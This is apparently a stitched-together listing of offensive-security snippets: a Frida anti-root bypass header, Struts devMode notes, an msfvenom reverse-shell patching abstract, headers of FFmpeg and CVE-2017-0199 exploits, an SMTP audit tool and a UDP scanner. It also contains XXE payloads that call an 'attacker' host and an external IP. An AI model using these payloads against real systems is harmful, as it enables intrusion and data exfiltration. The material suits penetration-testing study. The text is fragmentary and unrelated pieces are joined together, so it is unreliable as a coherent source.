| // $ frida -l antiroot.js -U -f com.example.app --no-pause | |
| // CHANGELOG by Pichaya Morimoto ([email protected]): | |
| // - I added extra whitelisted items to deal with the latest versions | |
| // of RootBeer/Cordova iRoot as of August 6, 2019 | |
| // - The original one just fucked up (kill itself) if Magisk is installed lol | |
| // Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/ | |
| // If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so | |
| Java.perform(function() { | |
| var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu", |
Apacje Struts is a open source framework utilizing JavaEE web applications and encouraging to employ MVC (Model View Controller) architecture. When having the application developed in so-called devMode as set in the struts.xml file:
<constant name="struts.devMode" value="true" />
Then the middleware will be handling additional parameters passed to every function invocation.
Abstract
This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.
Contents:
| Content-Type: text/xml | |
| <?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxetestd [<!ENTITY xxetest SYSTEM "http://attacker/test.dtd">]><foo>&xxetest;</foo> |
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
| #!/usr/bin/python | |
| # | |
| # Vulnerable software: | |
| # FFmpeg 0.4.9-pre1 (before 0.5), or the one accessible at: | |
| # SVN-16556 | |
| # svn checkout svn://svn.ffmpeg.org/ffmpeg/trunk@16556 ffmpeg | |
| # | |
| # Vulnerability has been discovered and documented by: | |
| # Tobias Klein / http://www.trapkit.de | |
| # http://www.trapkit.de/advisories/TKADV2009-004.txt |
| # Exploit Author: Juan Sacco at KPN Red Team | |
| # Developed using Exploit Pack - http://www.exploitpack.com <[email protected]> | |
| # | |
| # Description: Microsoft Word (CVE-2017-0199) is prone to a RCE trough a HTA Handler | |
| # A remote code execution vulnerability exists in the way that Microsoft Office and WordPad parse specially crafted files. | |
| # An attacker who successfully exploited this vulnerability could take control of an affected system. | |
| # | |
| # Impact: An attacker could exploit this vulnerability to execute arbitrary commands in the | |
| # context of the application. Failed exploit attempts could result in a | |
| # denial-of-service condition. |
| #!/usr/bin/python3 | |
| # | |
| # SMTP Server configuration black-box testing/audit tool, capable of auditing | |
| # SPF/Accepted Domains, DKIM, DMARC, SSL/TLS, SMTP services, banner, Authentication (AUTH, X-EXPS) | |
| # user enumerations (VRFY, EXPN, RCPT TO), and others. | |
| # | |
| # Currently supported tests: | |
| # 01) 'spf' - SPF DNS record test | |
| # - 'spf-version' - Checks whether SPF record version is valid | |
| # - 'all-mechanism-usage' - Checks whether 'all' mechanism is used correctly |
XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.
The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.
| #!/usr/bin/python | |
| # | |
| # Simple UDP scanner determining whether scanned host replies with | |
| # ICMP Desitnation Unreachable upon receiving UDP packet on some high, closed port. | |
| # | |
| # Based on "Black Hat Python" book by Justin Seitz. | |
| # | |
| # Mariusz B. | |
| # |